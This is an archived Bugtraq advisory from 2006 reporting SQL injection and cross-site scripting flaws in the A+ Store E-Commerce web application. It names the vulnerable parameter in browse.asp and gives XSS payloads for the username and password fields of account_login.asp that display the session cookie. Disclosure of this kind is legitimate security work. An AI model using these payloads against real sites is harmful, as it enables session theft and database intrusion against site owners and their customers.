Bugtraq mailing list archives
A+ Store E-Commerce[ injection sql & xss (post) ]
From: saps.audit () gmail com
Date: 14 Nov 2006 20:45:11 -0000
vendor site:http://www.webinhabit.com/ product:A+ Store E-Commerce bug:injection sql & xss post risk:medium injection sql (get) : http://site.com/browse.asp?ParentID='[sql] xss post : in /account_login.asp: username = </textarea>'"><script>alert(document.cookie)</script></textarea>'"><script>alert(document.cookie)</script> passwd = </textarea>'"><script>alert(document.cookie)</script></textarea>'"><script>alert(document.cookie)</script> laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit () gmail com
Current thread:
- A+ Store E-Commerce[ injection sql & xss (post) ] saps . audit (Nov 14)
